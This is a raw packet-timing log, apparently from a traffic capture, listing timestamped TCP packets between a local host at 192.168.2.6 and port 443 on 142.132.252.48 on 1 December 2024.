                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.809994936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.810039997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.810050011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.810092926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.810092926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.815527916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.815543890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.815615892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.815625906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.815692902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.958220005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.958249092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.958373070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.958395958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.960505962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.963824034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.963845015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.963902950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.963922977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.966573954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.968941927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.968959093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.969024897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.969042063 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.972544909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.995640039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.995661020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.995738983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.995759010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:12.996500969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.000627041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.000646114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.000700951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.000710964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.004507065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.006294966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.006310940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.006356955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.006373882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.006390095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.006414890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.011945009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.011962891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.012018919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.012032032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.012047052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.012490034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.016860008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.016885042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.016932011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.016942978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.016957998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.016979933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.159859896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.159889936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.159960032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.159986019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.160012007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.160556078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.165501118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.165522099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.165625095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.165649891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.166544914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.170777082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.170797110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.170917988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.170938015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.174741983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.197165966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.197186947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.197279930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.197309971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.197379112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.202151060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.202176094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.202239037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.202265978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.202282906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.202347994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.207768917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.207798004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.207890987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.207910061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.207998037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.213330030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.213350058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.213437080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.213465929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.213603973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.218381882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.218405962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.218481064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.218502998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.218595028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.218838930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.360989094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.361043930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.361167908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.361202955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.361423969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.367163897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.367182970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.367290020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.367331982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.367455959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.373611927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.373631001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.373709917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.373748064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.373812914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.398226976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.398247957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.398323059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.398348093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.398433924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.403168917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.403189898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.403256893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.403292894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.403309107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.403331995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.408946037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.408962965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.409033060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.409056902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.410988092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.414531946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.414557934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.414637089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.414669037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.418535948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.420228958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.420250893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.420303106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.420321941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.420360088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.420360088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.562325954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.562356949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.562427998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.562458038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.562494993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.562494993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.567779064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.567799091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.567888021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.567898989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.567980051 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.575077057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.575100899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.575165987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.575165987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.575176954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.575217009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.599545002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.599575996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.599649906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.599649906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.599668026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.599819899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.605237007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.605257034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.605298996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.605309010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.605345964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.605345964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.611030102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.611048937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.611331940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.611341953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.611538887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.615823030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.615842104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.615904093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.615904093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.615914106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.615964890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.758879900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.758913994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.759052992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.759066105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.759143114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.763649940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.763673067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.763763905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.763773918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.763814926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.769486904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.769506931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.769562960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.769583941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.769629002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.776281118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.776309967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.776381016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.776393890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.776411057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.776463985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.802414894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.802448034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.802573919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.802592993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.802632093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.806595087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.806626081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.806689024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.806689024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.806705952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.806787014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.811534882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.811573982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.811630011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.811630011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.811641932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.811742067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.817203999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.817235947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.817280054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.817296028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.817333937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.817365885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.960566998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.960596085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.960798979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.960814953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.960891962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.964565039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.964593887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.964653015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.964659929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.964701891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.964701891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.970700979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.970725060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.970999002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.971005917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.971067905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.977901936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.977927923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.978183985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.978199959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:13.978674889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.002294064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.002320051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.002463102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.002482891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.002525091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.007211924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.007240057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.007307053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.007320881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.007344007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.007381916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.012937069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.012964964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.013037920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.013057947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.013098001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.018604994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.018630981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.018687010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.018703938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.018718004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.018748045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.161633015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.161659956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.161727905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.161746979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.161781073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.161793947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.166197062 CET44349721142.132.252.48192.168.2.6
